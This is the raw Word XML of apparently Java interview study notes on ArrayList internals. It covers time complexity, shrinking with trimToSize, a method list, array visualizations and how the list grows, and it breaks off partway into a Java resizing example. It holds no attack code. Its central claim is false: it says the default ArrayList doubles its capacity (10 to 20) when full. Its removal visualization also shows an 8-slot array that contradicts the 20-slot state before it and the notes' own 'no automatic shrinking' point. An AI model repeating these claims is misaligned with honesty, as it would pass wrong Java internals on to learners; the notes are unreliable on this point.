        <w:t xml:space="preserve"> for removing an element by index is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where n is the number of elements after the removed element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AE096" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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7. Performance Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66A6EB" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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on</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Adding an element at the end is usually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unless resizing occurs. However, adding at any other position (such as the beginning) requires shifting elements, which takes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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E69B3" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The resizing operation, when it occurs, is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because all elements need to be copied to a new array. However, this only happens occasionally, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> time for adding elements is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9DA2E" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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8. Shrinking the Array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC414F7" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76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elements are removed and the size of the ArrayList decreases significantly, the internal array may not shrink automatically. This means that the ArrayList can hold a larger capacity than it actually needs, which can lead to wasted space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65241F" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76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owever, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually reduce the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by calling trimToSize(), which adjusts the internal array size to match the current size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F276B51" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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9. ArrayList Methods and Their Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CC2CA" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dd(E e)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds an element at the end of the list (O(1) unless resizing occurs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D99A59" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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get(int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the element at the specified index (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C030F70" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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move(int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes the element at the specified index and shifts subsequent elements (O(n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7423FD" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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t(int index, E element)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces the element at the specified index (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9574C2" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ize()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the number of elements in the ArrayList (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACF3C5" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Visualizing Internal Working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410965F" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itial State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B659121" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ArrayList starts with an empty array with a capacity of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D77ED" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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after adding 3 elements):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526EB03D" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="144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10, 20, 30, null, null, null, null, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BF8C9" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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fter Adding More Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (More than initial capacity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834350C" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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the 11th element is added, the internal array is resized (doubled in size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3FB48" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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after adding the 11th element):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BBE9E" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="144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10, 20, 30, 40, 50, 60, 70, 80, 90, 100, null, null, null, null, null, null, null, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C757D" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hen Elements Are Removed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573F7D4" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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after removing an element from the list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF75B6D" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="144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10, 20, 40, 50, 60, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B5584" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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 of Time Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C7887" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) (amortized time due to resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8A922" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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move</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(n) (due to shifting elements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D723D" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 (get)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329475CA" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047781E1" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ize (internal array expansion)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(n) when triggered, but happens rarely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE50C1" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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inal Thoughts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CE8E8" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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is ideal when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements and are mostly appending to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F00297" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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For operations like frequent insertions and deletions from the beginning or middle of the list, consider using other collections like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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34259236" w14:textId="7A75FEB5"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12318AA">
          <v:rect id="_x0000_i1502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0F793" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc196307638"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList increase its size dynamically?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="0BBB38B9" w14:textId="18791FF0" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00483F0C">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in Java dynamically increases its size to accommodate more elements when needed. This resizing mechanism allows the ArrayList to grow as elements are added, without requiring the user to manually manage the capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BCBCD" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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s a detailed explanation of how this resizing works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304652F6" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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Initial Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E978E4" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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you create an ArrayList, it starts with an initial capacity. By default, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 10, meaning that the internal array can hold up to 10 elements before it needs to resize. If you add more than 10 elements, the ArrayList will automatically resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF8E48" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449236A0" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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 the internal array is initially of size 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38466321" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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Adding Elements to the ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55BC01" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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elements are added using methods like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>add(E e)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the ArrayList first checks if there’s enough capacity in the internal array to hold the new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A7C75" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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array has space (i.e., the current size is less than the capacity), the element is simply added at the next available index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E256559" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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When the Capacity is Reached (Resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE0729" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76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ArrayList reaches its capacity (i.e., the number of elements in the list exceeds the capacity), the internal array needs to be resized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55853D" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76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izing involves creating a new, larger array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copying all the existing elements from the old array to the new one. This ensures that the ArrayList can accommodate additional elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E54ABA" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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Default Resizing Behavior (Doubling the Capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470AC0C" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76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y default, when the ArrayList runs out of space, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles its capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185001B" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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For example, if the current internal array has a capacity of 10 and you add the 11th element, the ArrayList will create a new internal array of size </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copy all elements from the old array to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661EB0B" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA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Example of Dynamic Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582D9AB" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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et’s walk through an example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E53256" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC8F672" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA327CA" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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ArrayListResizeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A48F2" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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2B0D6094" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197B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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
